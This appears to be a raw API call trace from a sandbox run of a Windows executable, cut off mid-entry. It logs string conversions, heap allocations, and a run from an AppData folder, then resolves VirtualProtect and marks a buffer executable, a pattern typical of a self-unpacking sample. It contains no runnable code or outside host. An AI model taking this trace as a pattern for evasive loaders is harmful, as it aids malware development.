!\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0174.302] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x19fc5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ»\x08Û\x9a\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0174.302] GetLastError () returned 0x0 [0174.302] SetLastError (dwErrCode=0x0) [0174.302] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0174.302] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0174.302] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0174.302] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0174.302] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x19fb5c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ»\x08Û\x9a\x94þ\x19", lpUsedDefaultChar=0x0) returned 256 [0174.302] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x418208, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih")) returned 0x2d [0174.303] GetLastError () returned 0x0 [0174.303] SetLastError (dwErrCode=0x0) [0174.303] GetLastError () returned 0x0 [0174.303] SetLastError (dwErrCode=0x0) [0174.303] GetLastError () returned 0x0 [0174.303] SetLastError (dwErrCode=0x0) [0174.303] GetLastError () returned 0x0 [0174.303] SetLastError (dwErrCode=0x0) [0174.303] GetLastError () returned 0x0 [0174.303] SetLastError (dwErrCode=0x0) [0174.303] GetLastError () returned 0x0 [0174.303] SetLastError (dwErrCode=0x0) [0174.303] GetLastError () returned 0x0 [0174.303] SetLastError (dwErrCode=0x0) [0174.303] GetLastError () returned 0x0 [0174.303] SetLastError (dwErrCode=0x0) [0174.303] GetLastError () returned 0x0 [0174.304] SetLastError (dwErrCode=0x0) [0174.304] GetLastError () returned 0x0 [0174.304] SetLastError (dwErrCode=0x0) [0174.304] GetLastError () returned 0x0 [0174.304] SetLastError (dwErrCode=0x0) [0174.304] GetLastError () returned 0x0 [0179.030] SetLastError (dwErrCode=0x0) [0179.031] GetLastError () returned 0x0 [0179.031] SetLastError (dwErrCode=0x0) [0179.031] GetLastError () returned 0x0 [0179.031] SetLastError (dwErrCode=0x0) [0179.031] GetLastError () returned 0x0 [0179.031] SetLastError (dwErrCode=0x0) [0179.031] GetLastError () returned 0x0 [0179.031] SetLastError (dwErrCode=0x0) [0179.031] GetLastError () returned 0x0 [0179.031] SetLastError (dwErrCode=0x0) [0179.031] GetLastError () returned 0x0 [0179.031] SetLastError (dwErrCode=0x0) [0179.031] GetLastError () returned 0x0 [0179.031] SetLastError (dwErrCode=0x0) [0179.031] GetLastError () returned 0x0 [0179.032] SetLastError (dwErrCode=0x0) [0179.032] GetLastError () returned 0x0 [0179.032] SetLastError (dwErrCode=0x0) [0179.032] GetLastError () returned 0x0 [0179.032] SetLastError (dwErrCode=0x0) [0179.032] GetLastError () returned 0x0 [0179.032] SetLastError (dwErrCode=0x0) [0179.032] GetLastError () returned 0x0 [0179.032] SetLastError (dwErrCode=0x0) [0179.032] GetLastError () returned 0x0 [0179.032] SetLastError (dwErrCode=0x0) [0179.032] GetLastError () returned 0x0 [0179.032] SetLastError (dwErrCode=0x0) [0179.032] GetLastError () returned 0x0 [0179.032] SetLastError (dwErrCode=0x0) [0179.032] GetLastError () returned 0x0 [0179.032] SetLastError (dwErrCode=0x0) [0179.032] GetLastError () returned 0x0 [0179.032] SetLastError (dwErrCode=0x0) [0179.032] GetLastError () returned 0x0 [0179.033] SetLastError (dwErrCode=0x0) [0179.033] GetLastError () returned 0x0 [0179.033] SetLastError (dwErrCode=0x0) [0179.033] GetLastError () returned 0x0 [0179.033] SetLastError (dwErrCode=0x0) [0179.033] GetLastError () returned 0x0 [0179.033] SetLastError (dwErrCode=0x0) [0179.033] GetLastError () returned 0x0 [0179.033] SetLastError (dwErrCode=0x0) [0179.033] GetLastError () returned 0x0 [0179.033] SetLastError (dwErrCode=0x0) [0179.033] GetLastError () returned 0x0 [0179.033] SetLastError (dwErrCode=0x0) [0179.033] GetLastError () returned 0x0 [0179.033] SetLastError (dwErrCode=0x0) [0179.033] GetLastError () returned 0x0 [0179.033] SetLastError (dwErrCode=0x0) [0179.033] GetLastError () returned 0x0 [0179.033] SetLastError (dwErrCode=0x0) [0179.033] GetLastError () returned 0x0 [0179.033] SetLastError (dwErrCode=0x0) [0179.034] GetLastError () returned 0x0 [0179.034] SetLastError (dwErrCode=0x0) [0179.034] GetLastError () returned 0x0 [0179.034] SetLastError (dwErrCode=0x0) [0179.034] GetLastError () returned 0x0 [0179.034] SetLastError (dwErrCode=0x0) [0179.034] GetLastError () returned 0x0 [0179.034] SetLastError (dwErrCode=0x0) [0179.034] GetLastError () returned 0x0 [0179.034] SetLastError (dwErrCode=0x0) [0179.034] GetLastError () returned 0x0 [0179.034] SetLastError (dwErrCode=0x0) [0179.034] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x0, Size=0x36) returned 0x20d1710 [0179.034] GetLastError () returned 0x0 [0179.034] SetLastError (dwErrCode=0x0) [0179.034] GetLastError () returned 0x0 [0179.034] SetLastError (dwErrCode=0x0) [0179.034] GetLastError () returned 0x0 [0179.035] SetLastError (dwErrCode=0x0) [0179.035] GetLastError () returned 0x0 [0179.035] SetLastError (dwErrCode=0x0) [0179.035] GetLastError () returned 0x0 [0179.035] SetLastError (dwErrCode=0x0) [0179.035] GetLastError () returned 0x0 [0179.035] SetLastError (dwErrCode=0x0) [0179.035] GetLastError () returned 0x0 [0179.035] SetLastError (dwErrCode=0x0) [0179.035] GetLastError () returned 0x0 [0179.035] SetLastError (dwErrCode=0x0) [0179.035] GetLastError () returned 0x0 [0179.035] SetLastError (dwErrCode=0x0) [0179.035] GetLastError () returned 0x0 [0179.035] SetLastError (dwErrCode=0x0) [0179.035] GetLastError () returned 0x0 [0179.035] SetLastError (dwErrCode=0x0) [0179.035] GetLastError () returned 0x0 [0179.035] SetLastError (dwErrCode=0x0) [0179.035] GetLastError () returned 0x0 [0179.036] SetLastError (dwErrCode=0x0) [0179.036] GetLastError () returned 0x0 [0179.036] SetLastError (dwErrCode=0x0) [0179.036] GetLastError () returned 0x0 [0179.036] SetLastError (dwErrCode=0x0) [0179.036] GetLastError () returned 0x0 [0179.036] SetLastError (dwErrCode=0x0) [0179.036] GetLastError () returned 0x0 [0179.036] SetLastError (dwErrCode=0x0) [0179.036] GetLastError () returned 0x0 [0179.036] SetLastError (dwErrCode=0x0) [0179.036] GetLastError () returned 0x0 [0179.036] SetLastError (dwErrCode=0x0) [0179.036] GetLastError () returned 0x0 [0179.036] SetLastError (dwErrCode=0x0) [0179.036] GetLastError () returned 0x0 [0179.036] SetLastError (dwErrCode=0x0) [0179.036] GetLastError () returned 0x0 [0179.036] SetLastError (dwErrCode=0x0) [0179.036] GetLastError () returned 0x0 [0179.036] SetLastError (dwErrCode=0x0) [0179.037] GetLastError () returned 0x0 [0179.037] SetLastError (dwErrCode=0x0) [0179.037] GetLastError () returned 0x0 [0179.037] SetLastError (dwErrCode=0x0) [0179.037] GetLastError () returned 0x0 [0179.037] SetLastError (dwErrCode=0x0) [0179.037] GetLastError () returned 0x0 [0179.037] SetLastError (dwErrCode=0x0) [0179.037] GetLastError () returned 0x0 [0179.037] SetLastError (dwErrCode=0x0) [0179.037] GetLastError () returned 0x0 [0179.037] SetLastError (dwErrCode=0x0) [0179.037] GetLastError () returned 0x0 [0179.037] SetLastError (dwErrCode=0x0) [0179.037] GetLastError () returned 0x0 [0179.037] SetLastError (dwErrCode=0x0) [0179.037] GetLastError () returned 0x0 [0179.037] SetLastError (dwErrCode=0x0) [0179.037] GetLastError () returned 0x0 [0179.037] SetLastError (dwErrCode=0x0) [0179.037] GetLastError () returned 0x0 [0179.038] SetLastError (dwErrCode=0x0) [0179.038] GetLastError () returned 0x0 [0179.038] SetLastError (dwErrCode=0x0) [0179.038] GetLastError () returned 0x0 [0179.038] SetLastError (dwErrCode=0x0) [0179.038] GetLastError () returned 0x0 [0179.038] SetLastError (dwErrCode=0x0) [0179.038] GetLastError () returned 0x0 [0179.038] SetLastError (dwErrCode=0x0) [0179.038] GetLastError () returned 0x0 [0179.038] SetLastError (dwErrCode=0x0) [0179.038] GetLastError () returned 0x0 [0179.038] SetLastError (dwErrCode=0x0) [0179.038] GetLastError () returned 0x0 [0179.038] SetLastError (dwErrCode=0x0) [0179.038] GetLastError () returned 0x0 [0179.038] SetLastError (dwErrCode=0x0) [0179.038] GetLastError () returned 0x0 [0179.038] SetLastError (dwErrCode=0x0) [0179.038] GetLastError () returned 0x0 [0179.039] SetLastError (dwErrCode=0x0) [0179.039] GetLastError () returned 0x0 [0179.039] SetLastError (dwErrCode=0x0) [0179.039] GetLastError () returned 0x0 [0179.039] SetLastError (dwErrCode=0x0) [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x90) returned 0x20d1750 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x1f) returned 0x20d17e8 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x2e) returned 0x20d1810 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x37) returned 0x20d1848 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x3c) returned 0x20d1888 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x31) returned 0x20d18d0 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x14) returned 0x20d1910 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x24) returned 0x20d1930 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0xd) returned 0x20d1960 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x1d) returned 0x20d1978 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x31) returned 0x20d19a0 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x15) returned 0x20d19e0 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x17) returned 0x20d1a00 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0xe) returned 0x20d1a20 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x69) returned 0x20d1a38 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x3e) returned 0x20d1ab0 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x1b) returned 0x20d1af8 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x1d) returned 0x20d1b20 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x48) returned 0x20d1b48 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x12) returned 0x20d1b98 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x18) returned 0x20d1bb8 [0179.039] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x1b) returned 0x20d1bd8 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x24) returned 0x20d1c00 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x29) returned 0x20d1c30 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x1e) returned 0x20d1c68 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x69) returned 0x20d1c90 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x17) returned 0x20d1d08 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0xf) returned 0x20d1d28 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x16) returned 0x20d1d40 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x2a) returned 0x20d1d60 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x29) returned 0x20d1d98 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x12) returned 0x20d1dd0 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x21) returned 0x20d1df0 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x16) returned 0x20d1e20 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x22) returned 0x20d1e40 [0179.040] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x12) returned 0x20d1e70 [0179.040] HeapFree (in: hHeap=0x20d0000, dwFlags=0x0, lpMem=0x20d0fd0 | out: hHeap=0x20d0000) returned 1 [0179.041] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x800) returned 0x20d1e90 [0179.042] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x80) returned 0x20d0fd0 [0179.042] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x403935) returned 0x0 [0179.043] RtlSizeHeap (HeapHandle=0x20d0000, Flags=0x0, MemoryPointer=0x20d0fd0) returned 0x80 [0179.043] GetLastError () returned 0x0 [0179.043] SetLastError (dwErrCode=0x0) [0179.043] GetLastError () returned 0x0 [0179.043] SetLastError (dwErrCode=0x0) [0179.043] GetLastError () returned 0x0 [0179.043] SetLastError (dwErrCode=0x0) [0179.044] GetLastError () returned 0x0 [0179.044] SetLastError (dwErrCode=0x0) [0179.044] GetLastError () returned 0x0 [0179.044] SetLastError (dwErrCode=0x0) [0179.044] GetLastError () returned 0x0 [0179.044] SetLastError (dwErrCode=0x0) [0179.044] GetLastError () returned 0x0 [0179.044] SetLastError (dwErrCode=0x0) [0179.044] GetLastError () returned 0x0 [0179.044] SetLastError (dwErrCode=0x0) [0179.044] GetLastError () returned 0x0 [0179.044] SetLastError (dwErrCode=0x0) [0179.044] GetLastError () returned 0x0 [0179.044] SetLastError (dwErrCode=0x0) [0179.044] GetLastError () returned 0x0 [0179.044] SetLastError (dwErrCode=0x0) [0179.044] GetLastError () returned 0x0 [0179.044] SetLastError (dwErrCode=0x0) [0179.044] GetLastError () returned 0x0 [0179.044] SetLastError (dwErrCode=0x0) [0179.044] GetLastError () returned 0x0 [0179.045] SetLastError (dwErrCode=0x0) [0179.045] GetLastError () returned 0x0 [0179.045] SetLastError (dwErrCode=0x0) [0179.045] GetLastError () returned 0x0 [0179.045] SetLastError (dwErrCode=0x0) [0179.045] GetLastError () returned 0x0 [0179.045] SetLastError (dwErrCode=0x0) [0179.045] GetLastError () returned 0x0 [0179.045] SetLastError (dwErrCode=0x0) [0179.045] GetLastError () returned 0x0 [0179.045] SetLastError (dwErrCode=0x0) [0179.045] GetLastError () returned 0x0 [0179.045] SetLastError (dwErrCode=0x0) [0179.045] GetLastError () returned 0x0 [0179.045] SetLastError (dwErrCode=0x0) [0179.045] GetLastError () returned 0x0 [0179.045] SetLastError (dwErrCode=0x0) [0179.045] GetLastError () returned 0x0 [0179.045] SetLastError (dwErrCode=0x0) [0179.045] GetLastError () returned 0x0 [0179.046] SetLastError (dwErrCode=0x0) [0179.046] GetLastError () returned 0x0 [0179.046] SetLastError (dwErrCode=0x0) [0179.046] GetLastError () returned 0x0 [0179.046] SetLastError (dwErrCode=0x0) [0179.046] GetLastError () returned 0x0 [0179.046] SetLastError (dwErrCode=0x0) [0179.046] GetLastError () returned 0x0 [0179.046] SetLastError (dwErrCode=0x0) [0179.046] GetLastError () returned 0x0 [0179.046] SetLastError (dwErrCode=0x0) [0179.046] GetLastError () returned 0x0 [0179.046] SetLastError (dwErrCode=0x0) [0179.046] GetLastError () returned 0x0 [0179.046] SetLastError (dwErrCode=0x0) [0179.046] GetLastError () returned 0x0 [0179.046] SetLastError (dwErrCode=0x0) [0179.046] GetLastError () returned 0x0 [0179.046] SetLastError (dwErrCode=0x0) [0179.047] GetLastError () returned 0x0 [0179.047] SetLastError (dwErrCode=0x0) [0179.047] GetLastError () returned 0x0 [0179.047] SetLastError (dwErrCode=0x0) [0179.047] GetLastError () returned 0x0 [0179.047] SetLastError (dwErrCode=0x0) [0179.047] GetLastError () returned 0x0 [0179.047] SetLastError (dwErrCode=0x0) [0179.047] GetLastError () returned 0x0 [0179.047] SetLastError (dwErrCode=0x0) [0179.047] GetLastError () returned 0x0 [0179.047] SetLastError (dwErrCode=0x0) [0179.047] GetLastError () returned 0x0 [0179.047] SetLastError (dwErrCode=0x0) [0179.047] GetLastError () returned 0x0 [0179.047] SetLastError (dwErrCode=0x0) [0179.047] GetLastError () returned 0x0 [0179.047] SetLastError (dwErrCode=0x0) [0179.047] GetLastError () returned 0x0 [0179.048] SetLastError (dwErrCode=0x0) [0179.048] GetLastError () returned 0x0 [0179.048] SetLastError (dwErrCode=0x0) [0179.048] GetLastError () returned 0x0 [0179.048] SetLastError (dwErrCode=0x0) [0179.048] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74650000 [0179.048] GetProcAddress (hModule=0x74650000, lpProcName="LocalAlloc") returned 0x74667a30 [0179.049] LocalAlloc (uFlags=0x0, uBytes=0x7fd8) returned 0x531c28 [0179.049] GetProcAddress (hModule=0x74650000, lpProcName="VirtualProtect") returned 0x74667a50 [0179.050] VirtualProtect (in: lpAddress=0x531c28, dwSize=0x7fd8, flNewProtect=0x40, lpflOldProtect=0x19febc | out: lpflOldProtect=0x19febc*=0x4) returned 1 [0179.052] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.053] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId (Process=0x0) returned 0x0 [0179.054] GetProcessId 